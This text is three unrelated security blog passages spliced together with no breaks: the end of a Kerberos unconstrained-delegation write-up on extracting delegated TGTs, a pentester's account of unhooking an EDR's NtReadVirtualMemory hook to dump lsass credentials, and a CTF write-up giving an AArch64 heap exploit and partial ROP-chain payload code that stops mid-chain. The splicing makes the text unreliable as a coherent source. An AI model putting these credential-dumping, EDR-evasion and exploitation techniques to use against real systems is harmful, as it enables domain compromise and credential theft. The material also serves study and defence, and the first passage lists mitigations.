Whoever designed these protocols thought it would be a great idea to not only use ASN.1, but to mix ASN.1 with some custom binary constants in one structure (and to let part of that structure depend on the constant). This makes it pretty unusable with any standard ASN.1 library. Fortunately I did find some ways to hack around this, which is already an improvement on having to write your own ASN.1 parser.
Once we reliably parsed the structure, we can see the
AP_REQ
message containing a Kerberos ticket and an authenticator. These are both important in Kerberos authentication:
The ticket is encrypted with the password of “our” service. It contains information that identifies the user who is authenticating, as well as an encrypted session key. This ticket is also used for authorization, since it contains a PAC with the groups the user is a member of.
The authenticator is an structure encrypted with the session key. It proves the client is in posession of this key and is used to authenticate the client.
When you see this in Wireshark, it is easy to notice the difference between a regular Kerberos
AP_REQ
packet and one where a TGT is sent along with it (unconstrained delegation). A regular
AP_REQ
packet will contain an encrypted ticket, which is the largest substructure in the
AP_REQ
structure. In the case of my test domain, the ticket is 1180 bytes. If unconstrained delegation is used, the largest substructure in the
AP_REQ
is the authenticator, which contains the delegated TGT from the user. In my domain this is 1832 bytes. An authenticator that doesn’t contain a TGT is usually much smaller, around 400 bytes.
Using the previously calculated Kerberos keys, we decrypt the ticket and get the following structure:
Contained within are the ticket validity, the username of the ticket, some Authorization Data (which includes the user PAC), and an Encryption key. This Encryption key is the session key, with which we can decrypt the authenticator of the
Here we see again the user that authenticated, another encryption key (subkey), more authorization data, and a checksum (which I’ve cut short). The checksum is the interesting part. If it’s value is equal to 32771 (or
0x8003
) it means that it is a KRBv5 checksum, which is a special structure defined in RFC4121 section 4.1.1 (apparently the authors of the RFC were also tired of ASN.1, introducing another custom format for transferring binary data).
Within this checksum field, (if the correct flags are set), we can find a KRB_CRED structure (back to ASN.1!) which contains the delegated TGT.
There is one more step separating us from obtaining our TGT, which is decrypting the
enc-part
. This encrypted part of the
KRB_CRED
structure contains the ticket information, including the session key associated with the delegated TGT, which we need to request service tickets at the DC. After decryption, the tickets are saved to disk, either in
ccache
format, which is used by impacket, or in
kirbi
format (which is the name used by Mimikatz for KRB_CRED structured files). The delegated TGT can now be used by other tools to authenticate to any system in the domain.
If this wasn’t detailled enough for you yet, all the steps described in this section are outlined in the kerberos.py file of krbrelayx. If you uncomment the
print
statements at various stages you can view the full structures.
Mitigations and detection
The most straightforward mitigation is to avoid using unconstrained delegation wherever possible. Constrained delegation is much safer and while it can be abused as well, constrained delegation only allows for authentication to services which you explicitly specify, making it possible to make a risk analysis for individual services. Unconstrained delegation makes this depend on whichever user connects to the service, which then has their credentials exposed. If running accounts with unconstrained delegation rights cannot be avoided, the following mitigations can be applied:
Make sure to guard the systems that have these privileges as sensitive assets from which domain compromise is likely possible.
Protect sensitive accounts by enabling the option “Account is sensitive and cannot be delegated” option.
Place administrative accounts in the “Protected Users” group, which will prevent their credentials from being delegated.
Make sure that administrative accounts perform their actions from up-to-date workstations with Credential Guard enabled, which will prevent credential delegation.
Regarding detection, Roberto Rodriguez from Specterops wrote an article a while back about the exact events involved with unconstrained delegation which allow detection of unconstrained delegation abuse.
Tooling
The tools are available on my GitHub: https://github.com/dirkjanm/krbrelayx Please read the README for install instructions and TODO items/limitations!
On a recent internal penetration engagement, I was faced against an EDR product that I will not name. This product greatly hindered my ability to access lsass’ memory and use our own custom flavor of Mimikatz to dump clear-text credentials.
For those who recommends ProcDump
The Wrong Path
So now, as an ex-malware author — I know that there are a few things you could do as a driver to accomplish this detection and block. The first thing that comes to my mind was Obregistercallback which is commonly used by many Antivirus products. Microsoft implemented this callback due to many antivirus products performing very sketchy winapi hooks that reassemble malware rootkits. However, at the bottom of the msdn page, you will notice a text saying “Available starting with Windows Vista with Service Pack 1 (SP1) and Windows Server 2008.” To give some missing context, I am on a Windows server 2003 at the moment. Therefore, it is missing the necessary function to perform this block.
After spending hours and hours, doing black magic stuff with csrss.exe and attempting to inherit a handle to lsass.exe through csrss.exe, I was successful in gaining a handle with PROCESS_ALL_ACCESS to lsass.exe. This was through abusing csrss to spawn a child process and then inherit the already existing handle to lsass.
There is no EDR solution on this machine, this was just an PoC
However, after thinking “I got this!” and was ready to rejoice in victory over defeating a certain EDR, I was met with a disappointing conclusion. The EDR blocked the shellcode injection into csrss as well as the thread creation through RtlCreateUserThread. However, for some reason — the code while failing to spawn as a child process and inherit the handle, was still somehow able to get the PROCESS_ALL_ACCESS handle to lsass.exe.
WHAT?!
Hold up, let me try just opening a handle to lsass.exe without any fancy stuff with just this line:
And what do you know, I got a handle with FULL CONTROL over lsass.exe. The EDR did not make a single fuzz about this. This is when I realized, I started off the approach the wrong way and the EDR never really cared about you gaining the handle access. It is what you do afterward with that handle that will come under scrutiny.
Back on Track
Knowing there was no fancy trick in getting a full control handle to lsass.exe, we can now move forward to find the next point of the issue. Immediately calling MiniDumpWriteDump() with the handle failed spectacularly.
Let’s dissect this warning further. “Violation: LsassRead”. I didn’t read anything, what are you talking about? I just want to do a dump of the process. However, I also know that to make a dump of a remote process, there must be some sort of WINAPI being called such as ReadProcessMemory (RPM) inside MiniDumpWriteDump(). Let’s look at MiniDumpWriteDump’s source code at ReactOS.
Multiple calls to RPM
As you can see by, the function (2) dump_exception_info(), as well as many other functions, relies on (3) RPM to perform its duty. These functions are referenced by MiniDumpWriteDump (1) and this is probably the root of our issue. Now here is where a bit of experience comes into play. You must understand the Windows System Internal and how WINAPIs are processed. Using ReadProcessMemory as an example — it works like this.
ReadProcessMemory is just a wrapper. It does a bunch of sanity check such as nullptr check. That is all RPM does. However, RPM also calls a function “NtReadVirtualMemory”, which sets up the registers before doing a syscall instruction. Syscall instruction is just telling the CPU to enter kernel mode which then another function ALSO named NtReadVirtualMemory is called, which does the actual logic of what ReadProcessMemory is supposed to do.
With that knowledge, we now must identify HOW the EDR product is detecting and stopping the RPM/NtReadVirtualMemory call. This comes as a simple answer which is “hooking”. Please refer to my previous post regarding hooking here for more information. In short, it gives you the ability to put your code in the middle of any function and gain access to the arguments as well as the return variable. I am 100% sure that the EDR is using some sort of hook through one or more of the various techniques that I mentioned.
However, readers should know that most if not all EDR products are using a service, specifically a driver running inside kernel mode. With access to the kernel mode, the driver could perform the hook at ANY of the level in the RPM’s callstack. However, this opens up a huge security hole in a Windows environment if it was trivial for any driver to hook ANY level of a function. Therefore, a solution is to put forward to prevent modification of such nature and that solution is known as Kernel Patch Protection (KPP or Patch Guard). KPP scans the kernel on almost every level and will triggers a BSOD if a modification is detected. This includes ntoskrnl portion which houses the WINAPI’s kernel level’s logic. With this knowledge, we are assured that the EDR would not and did not hook any kernel level function inside that portion of the call stack, leaving us with the user-land’s RPM and NtReadVirtualMemory calls.
The Hook
To see where the function is located inside our application’s memory, it is as trivial as a printf with %p format string and the function name as the argument, such as below.
However, unlike RPM, NtReadVirtualMemory is not an exported function inside ntdll and therefore you cannot just reference to the function like normal. You must specify the signature of the function as well as linking ntdll.lib into your project to do so.
With everything in place, let’s run it and take a look!
Now, this provides us with the address of both RPM and ntReadVirtualMemory. I will now use my favorite reversing tool to read the memory and analyze its structure, Cheat Engine.
ReadProcessMemoryNtReadVirtualMemory
For the RPM function, it looks fine. It does some stack and register set up and then calls ReadProcessMemory inside Kernelbase (Topic for another time). Which would eventually leads you down into ntdll’s NtReadVirtualMemory. However, if you look at NtReadVirtualMemory and know what the most basic detour hook look like, you can tell that this is not normal. The first 5 bytes of the function is modified and the rest are left as-is. You can tell this by looking at other similar functions around it. All the other functions follows a very similar format:
With one difference being the syscall id (which identifies the WINAPI function to be called once inside kernel land). However, for NtReadVirtualMemory, the first instruction is actually a JMP instruction to an address somewhere else in memory. Let’s follow that.
CyMemDef64.dll
Okay, so we are no longer inside ntdll’s module but instead inside CyMemdef64.dll’s module. Ahhhhh now I get it.
The EDR placed a jump instruction where the original NtReadVirtualMemory function is supposed to be, redirect the code flow into their own module which then checked for any sort of malicious activity. If the checks fail, the Nt* function would then return with an error code, never entering the kernel land and execute to begin with.
The Bypass
It is now very self-evident what the EDR is doing to detect and stop our WINAPI calls. But how do we get around that? There are two solutions.
Re-Patch the Patch
We know what the NtReadVirtualMemory function SHOULD looks like and we can easily overwrite the jmp instruction with the correct instructions. This will stop our calls from being intercepted by CyMemDef64.dll and enter the kernel where they have no control over.
Ntdll IAT Hook
We could also create our own function, similar to what we are doing in Re-Patch the Patch, but instead of overwriting the hooked function, we will recreate it elsewhere. Then, we will walk Ntdll’s Import Address Table, swap out the pointer for NtReadVirtualMemory and points it to our new fixed_NtReadVirtualMemory. The advantage of this method is that if the EDR decides to check on their hook, it will looks unmodified. It just is never called and the ntdll IAT is pointed elsewhere.
The Result
I went with the first approach. It is simple, and it allows me to get out the blog quicker :). However, it would be trivial to do the second method and I have plans on doing just that within a few days. Introducing AndrewSpecial, for my manager Andrew who is currently battling a busted appendix in the hospital right now. Get well soon man.
AndrewSpecial.exe was never caught 😛
Conclusion
This currently works for this particular EDR, however — It would be trivial to reverse similar EDR products and create a universal bypass due to their limitation around what they can hook and what they can’t (Thank you KPP).
Before we dive into the challenge, let’s just skim over the basics quickly. I’ll try to explain everything to the best of my ability and knowledge.
Registers
Aarch64 has 31 general purpose registers, x0 to x30. Since it’s a 64 bit architechture, all the registers are 64 bit. But we can access the lower 32 bits of thes registers by using them with the w prefix, such as w0 and w1.
There is also a 32nd register, known as xzr or the zero register. It has multiple uses which I won’t go into but in certain contexts, it is used as the stack pointer (esp equivalent) and is thereforce aliased as sp.
Instructions
Here are some basic instructions:
mov
— Just like it’s x86 counterpart, copies one register into another. It can also be used to load immediate values. mov x0, x1; copies x1 into x0
mov x1, 0x4141; loads the value 0x4141 in x1
str
/
ldr
— store and load register. Basically stores and loads a register from the given pointer. str x0, [x29]; store x0 at the address in x29
ldr x0, [x29]; load the value from the address in x29 into x0
stp
/
ldp
— store and load a pair of registers. Same as
str
/
ldr
but instead with a pair of registers stp x29, x30, [sp]; store x29 at sp and x30 at sp+8
bl
/
blr
— Branch link (to register). The x86 equivalent is
call
. Basically jumps to a subroutine and stores the return address in x30. blr x0; calls the subroutine at the address stored in x0
b
/
br
— Branch (to register). The x86 equivalent is
jmp
. Basically jumps to the specified address br x0; jump to the address stored in x0
ret
— Unlike it’s x86 equivalent which pops the return address from stack, it looks for the return address in the x30 register and jumps there.
Indexing modes
Unlike x86, load/store instructions in Aarch64 has three different indexing “modes” to index offsets:
Immediate offset :
[base, #offset]
— Index an offset directly and don’t mess with anything else ldr x0, [sp, 0x10]; load x0 from sp+0x10
Pre-indexed :
[base, #offset]!
— Almost the same as above, except that base+offset is written back into base. ldr x0, [sp, 0x10]!; load x0 from sp+0x10 and then increase sp by 0x10
Post-indexed :
[base], #offset
— Use the base directly and then write base+offset back into the base ldr x0, [sp], 0x10; load x0 from sp and then increase sp by 0x10
Stack and calling conventions
The registers x0 to x7 are used to pass parameters to subroutines and extra parameters are passed on the stack.
The return address is stored in x30, but during nested subroutine calls, it gets preserved on the stack. It is also known as the link register.
The x29 register is also known as the frame pointer and it’s x86 equivalent is ebp. All the local variables on the stack are accessed relative to x29 and it holds a pointer to the previous stack frame, just like in x86.
One interesting thing I noticed is that even though ebp is always at the bottom of the current stack frame with the return address right underneath it, the x29 is stored at an optimal position relative to the local variables. In my minimal testcases, it was always stored on the top of the stack (along with the preserved x30) and the local variables underneath it (basically a flipped oritentation compared to x86).
The challenge
We are provided with the challenge files and the following description:
Challenge runs on ubuntu 18.04 aarch64, chrooted
It comes with the challenge binary, the libc and a placeholder flag file. It was the mentioned that the challenge is being run in a chroot, so we probably can’t get a shell and would need to do a open/read/write ropchain.
The first thing we need is to set-up an environment. Fortunately, AWS provides pre-built Aarch64 ubuntu server images and that’s what we will use from now on.
Part 1 — The heap
Not Yet Another Note Challenge...
====== menu ======
1. alloc
2. view
3. edit
4. delete
5. quit
We are greeted with a wonderful and familiar (if you’re a regular CTFer) prompt related to heap challenges.
Playing with it a little, we discover an int underflow in the alloc function, leading to a heap overflow in the edit function:
__int64 do_add()
{
__int64 v0; // x0
int v1; // w0
signed __int64 i; // [xsp+10h] [xbp+10h]
__int64 v4; // [xsp+18h] [xbp+18h]
for ( i = 0LL; ; ++i )
{
if ( i > 7 )
return puts("no more room!");
if ( !mchunks[i].pointer )
break;
}
v0 = printf("len : ");
v4 = read_int(v0);
mchunks[i].pointer = malloc(v4);
if ( !mchunks[i].pointer )
return puts("couldn't allocate chunk");
printf("data : ");
v1 = read(0LL, mchunks[i].pointer, v4 - 1);
LOWORD(mchunks[i].size) = v1;
*(_BYTE *)(mchunks[i].pointer + v1) = 0;
return printf("chunk %d allocated\n");
}
__int64 do_edit()
{
__int64 v0; // x0
__int64 result; // x0
int v2; // w0
__int64 v3; // [xsp+10h] [xbp+10h]
v0 = printf("index : ");
result = read_int(v0);
v3 = result;
if ( result >= 0 && result <= 7 )
{
result = LOWORD(mchunks[result].size);
if ( LOWORD(mchunks[v3].size) )
{
printf("data : ");
v2 = read(0LL, mchunks[v3].pointer, (unsigned int)LOWORD(mchunks[v3].size) - 1);
LOWORD(mchunks[v3].size) = v2;
result = mchunks[v3].pointer + v2;
*(_BYTE *)result = 0;
}
}
return result;
}
If we enter 0 as
len
in alloc, it would allocate a valid heap chunk and read -1 bytes into it. Because read uses unsigned values, -1 would become 0xffffffffffffffff and the read would error out as it’s not possible to read such a huge value.
With read erroring out, the return value (-1 for error) would then be stored in the
size
member of the global chunk struct. In the edit function, the
size
is used as a 16 bit unsigned int, so -1 becomes 0xffff, leading to the overflow
Since this post is about ROP-ing and the heap in Aarch64 is almost the same as x86, I’ll just be skimming over the heap exploit.
Because there was no
free()
in the binary, we overwrote the size of the top_chunk which got freed in the next allocation, giving us a leak.
Since the challenge server was using libc2.27, tcache was available which made our lives a lot easier. We could just overwrite the FD of the top_chunk to get an arbitrary allocation.
First we leak a libc address, then use it to get a chunk near
environ
, leaking a stack address. Finally, we allocate a chunk near the return address (saved x30 register) to start writing our ROP-chain.
Part 2 — The ROP-chain
Now starts the interesting part. How do we find ROP gadgets in Aarch64?
Fortunately for us, ropper supports Aarch64. But what kind of gadgets exist in Aarch64 and how can we use them?
Aaaaand we are blasted with a shitload of gadgets.
Most of the these are actually not very useful as the
ret
depends on the x30 register. The address in x30 is where gadget will return when it executes a
ret
.
If the gadget doesn’t modify x30 in a way we can control it, we won’t be able to control the exectuion flow and get to the next gadget.
So to get a ROP-chain running in Aarch64, we can only use the gadgets which:
perform the function we want
pop x30 from the stack
ret
With our heap exploit, we were only able to allocate a 0x98 chunk on the stack and the whole open/read/write chain would take a lot more space, so the first thing we need is to read in a second ROP-chain.
One way to do that is to call
gets(stack_address)
, so we can basically write an infinite ROP-chain on the stack (provided no newlines).
So how do we call
gets()
? It’s a libc function and we already have a libc leak, the only thing we need is to get the address of
gets
in x30 and a stack address in x0 (function parameters are passedin x0 to x7).
After a bit of gadget hunting, here is the gadget I settled upon:
assume that the return address is in x30 (it would be in a normal execution) and thus it tries to preserve it on the stack along with x29.
Unfortunately for us, since we reached there with
ret
, the x30 holds the address of
gets
itself.
If this continues, it would pop the preserved x30 at the end of
gets
and then jump back to
gets
again in an infinite loop.
To bypass it, we use a simple trick and return at
gets+0x8
, skipping the preservation. This way, when it pops x30 at the end, we would be able to control it and jump to our next gadget.
This is the rough sketch of our first stage ROP-chain:
gadget = libcbase + 0x00062554 #0x0000000000062554 : ldr x0, [x29, #0x18] ; ldp x29, x30, [sp], #0x20 ; ret // to control x0
payload = ""
payload += p64(next_x29) + p64(gadget) + p64(0x0) + p64(0x8) # 0x0 and 0x8 are the local variables that shouldn't be overwritten
payload += p64(next_x29) + p64(gets_address) + p64(0x0) + p64(new_x29_stack) # Link register pointing to the next frame + gets() of libc + just a random stack variable + param popped by gadget_1 into x1 (for param of gets)
Now that we have infinite space for our second stage ROP-chain, what should we do?
At first we decided to do the open/read/write all in ROP but it would make it unnecessarily long and complex, so instead we
mprotect()
the stack to make it executable and then jump to shellcode we placed on the stack.
mprotect
takes 3 arguments, so we need to control x0, x1 and x2 to succeed.
Well, we began gadget hunting again. We already control x0, so we found this gadget:
gadget_1 = 0x00000000000ed2f8 : mov x1, x0 ; ret
At first glance, it looks perfect, copying x0 into x1. But if you have been paying close attention, you would realize it doesn’t modify x30, so we won’t be able to control execution beyond this.
What if we take a page from JOP (jump oriented programming) and find a gadget which given us the control of x30 and then jumps (not call) to another user controlled address?
The first gadget here gives us control of x19 and x20, the second one moves x19 into x3 and calls x20.
Chaining these two, we can control x3 and still have control over the execution.
Here’s our plan:
Have x0 as 0x500 (mprotect length) with the same gadget we used before
Use gadget_3 to make x19 = gadget_1 and x20 = gadget_2
return to gadget_4 from gadget_3, making x3 = x19 (gadget_1)
gadget_4 calls x20 (gadget_2)
gadget_2 gives us a controlled x30 and jumps to x3 (gadget_1)
gadget_1 moves x0 (0x500) into x1 and returns
Here’s the rough code equivalent:
payload = ""
payload += p64(next_x29) + p64(gadget_3) + p64(0x0) * x (depends on stack) #returns to gadget_3
payload += p64(next_x29) + p64(gadget_4) + p64(gadget_1) + p64(gadget_2) + p64(0x0) * 4 # moves gadget_1/3 into x19/20 and returns to gadget_4
payload += p64(next_x29) + p64(next_gadget) #setting up for the next gadget and moving x19 into x3. x20 (gadget_2) is called from gadget_4
That was haaard, now let’s see how we can control x2…